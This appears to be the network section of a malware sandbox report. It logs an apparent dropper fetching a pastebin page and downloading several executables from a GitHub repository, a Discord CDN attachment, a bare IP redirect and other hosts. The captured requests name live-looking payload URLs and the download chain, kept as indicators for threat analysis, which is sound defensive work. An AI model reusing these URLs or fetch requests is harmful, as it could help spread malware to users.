Network Analysis

GET /raw/xYhKBupz HTTP/1.1 Host: pastebin.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Mon, 12 Aug 2024 01:00:40 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: EXPIRED Last-Modified: Mon, 12 Aug 2024 01:00:40 GMT Server: cloudflare CF-RAY: 8b1c87a01b4729df-FUK

GET /evan9908/Setup/raw/main/222fastsetup.exe HTTP/1.1 Host: github.com Connection: Keep-Alive

HTTP/1.1 302 Found Server: GitHub.com Date: Mon, 12 Aug 2024 01:00:41 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Access-Control-Allow-Origin: Location: https://raw.githubusercontent.com/evan9908/Setup/main/222fastsetup.exe Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/github-completion/completions proxy.enterprise.githubcopilot.com/v1/engines/github-completion/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/ Content-Length: 0 X-GitHub-Request-Id: C00F:0A4D:D45B4E:FA3635:66B95EB8

GET /attachments/992447897431978184/1272110855789609012/setup.exe?ex=66b9c90e&is=66b8778e&hm=e8455d1fc18777dd82c36c2f38f2ff7183f2d98ce3885f05b556912b31748099& HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Mon, 12 Aug 2024 01:00:41 GMT Content-Type: application/x-msdos-program Content-Length: 7591656 Connection: keep-alive CF-Ray: 8b1c87a54da330cd-ICN CF-Cache-Status: HIT Accept-Ranges: bytes, bytes Age: 59099 Cache-Control: public, max-age=31536000 Content-Disposition: attachment; filename="setup.exe" ETag: "5dc97eacc5086f917367b3e29d0e459e" Expires: Tue, 12 Aug 2025 01:00:41 GMT Last-Modified: Sun, 11 Aug 2024 08:34:22 GMT Vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 x-goog-generation: 1723365262757529 x-goog-hash: crc32c=QVPp8A== x-goog-hash: md5=Xcl+rMUIb5FzZ7PinQ5Fng== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 7591656 x-guploader-uploadid: AHxI1nNaBgK_hGS9kZsercx1M4PqBi5muK8JQkKNUzVjQgCyor_s0gfDWtbplNwlSqmOMW9gS_Q X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: __cf_bm=qhhid41gWvLfHvc49KKztvYQjLFXtg4CXhghYFWRCCo-1723424441-1.0.1.1-xxcPrPNhGe9WxzyBIDQ9ik.zuh5H7UlXPkyXVuXdCg5QMvhKWGl.9VOwvVO0kaBHQ1dHUmKC.hHJxilN7oCrCg; path=/; expires=Mon, 12-Aug-24 01:30:41 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rlk552ktKUuZk3J7%2BkoMrI0vTdl9YIwR%2Bcpfn18A4m5v4RSXq4wHtPxR37vrePyBmCSD83MQ5L8yOGUdzAGkoBoSfnLNuAMFDM1OYEpSIn3n5CJC7rVGVPzwc0Ek0naKfHMUcw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Set-Cookie: _cfuvid=hPlq.9Y.KbNNbJR6Jq1yxhQJH3jJEAJDd2zjLRj8X38-1723424441193-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare

GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive

HTTP/1.1 403 Forbidden Date: Mon, 12 Aug 2024 01:00:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Content-Options: nosniff X-Frame-Options: SAMEORIGIN cf-mitigated: challenge cf-chl-out: 976HLdL4JcUo/Xdj93NgXo693RZZrv1n/+pj/yjvZlosi8Y9tsAX6c+NzDQv2BcZEJFWlV9TYZwENdvjcDeUBQGe5HjJ9g949NjwcEyC6sw=$Hajvo4FqWkUhnC5UbxWFzQ== Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BRP45t11kHkSqXDNr7B3WznNyLJm%2BanZDd9%2Bl2TvDu9e6VPY%2F8SGSfWB0y8a%2Fw%2BvHlfiHvEPehgBhZhb7F0tCTxWTLirfZrxkuda8DysFJoathLphcSjAnM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b1c87a84f822eed-LAX alt-svc: h3=":443"; ma=86400

GET /d/385121 HTTP/1.1 Host: 194.58.114.223 Connection: Keep-Alive

HTTP/1.1 302 Found Server: nginx Date: Mon, 12 Aug 2024 01:00:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=120 Location: https://cdn.discordapp.com/attachments/992447897431978184/1272110855789609012/setup.exe?ex=66b9c90e&is=66b8778e&hm=e8455d1fc18777dd82c36c2f38f2ff7183f2d98ce3885f05b556912b31748099&

GET /parts/setup1.exe HTTP/1.1 Host: 58yongzhe.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Mon, 12 Aug 2024 01:00:41 GMT Server: nginx/1.26.1 Content-Type: application/x-dosexec Content-Length: 419328 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive

GET /DigiCertGlobalRootG2.crt HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: cacerts.digicert.com

HTTP/1.1 200 OK Accept-Ranges: bytes Age: 8563 cache-control: max-age=172800, public Content-Type: application/pkix-cert Date: Mon, 12 Aug 2024 01:00:41 GMT Etag: "5a286417-392" expires: Wed, 14 Aug 2024 01:00:41 GMT last-modified: Wed, 06 Dec 2017 21:41:43 GMT Server: ECAcc (tkc/BECE) X-Cache: HIT Content-Length: 914